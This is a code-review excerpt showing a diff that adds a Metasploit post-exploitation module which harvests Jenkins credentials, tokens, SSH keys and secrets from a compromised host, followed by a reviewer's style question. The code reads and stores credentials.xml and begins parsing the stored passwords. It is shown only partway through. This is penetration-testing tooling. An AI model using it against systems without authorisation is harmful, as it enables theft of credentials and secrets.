modules/post/multi/gather/jenkins_gather.rb

```diff
@@ -0,0 +1,433 @@
+require 'nokogiri'
+require 'base64'
+require 'digest'
+require 'openssl'
+require 'sshkey'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Linux::System
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name' => 'Jenkins Credential Collector',
+      'Description' => %q(
+        This module can be used to extract saved Jenkins credentials, user
+        tokens, SSH keys, and secrets. Interesting files will be stored in
+        loot along with combined csv output.
+      ),
+      'License' => MSF_LICENSE,
+      'Author' => [ 'thesubtlety' ],
+      'Platform' => [ 'linux', 'win' ],
+      'SessionTypes' => [ %w[ shell meterpreter ] ]
+    ))
+    register_options(
+      [  OptBool.new('STORE_LOOT', [false, 'Store files in loot (will simply output file to console if set to false).', true]),
+         OptBool.new('SEARCH_JOBS', [false, 'Search through job history logs for interesting keywords. Increases runtime.', false])
+      ])
+
+    @nodes = []
+    @creds = []
+    @ssh_keys = []
+    @api_tokens = []
+  end
+
+  def report_creds(user, pass)
+    return if user.empty? || pass.empty?
+      credential_data = {
+        origin_type: :session,
+        post_reference_name: self.fullname,
+        private_data: pass,
+        private_type: :password,
+        session_id: session_db_id,
+        username: user,
+        workspace_id: myworkspace_id
+      }
+
+      create_credential(credential_data)
+  end
+
+  def parse_credentialsxml(file)
+    vprint_status("Parsing credentials.xml...")
+    if exists?(file)
+      f = read_file(file)
+      if datastore['STORE_LOOT']
+        loot_path = store_loot('credentials.xml', 'text/plain', session, f)
+        vprint_status("File credentials.xml saved to #{loot_path}")
+      end
+    else
+      print_error("Could not read credentials.xml...")
+    end
+
+    xml_doc = Nokogiri::XML(f)
+    xml_doc.xpath("//com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl").each do |node|
+      username    = ""
+      password    = ""
+      description = ""
```

Comment:
Is there some benefit to assigning the empty string to these variables before you assign them values?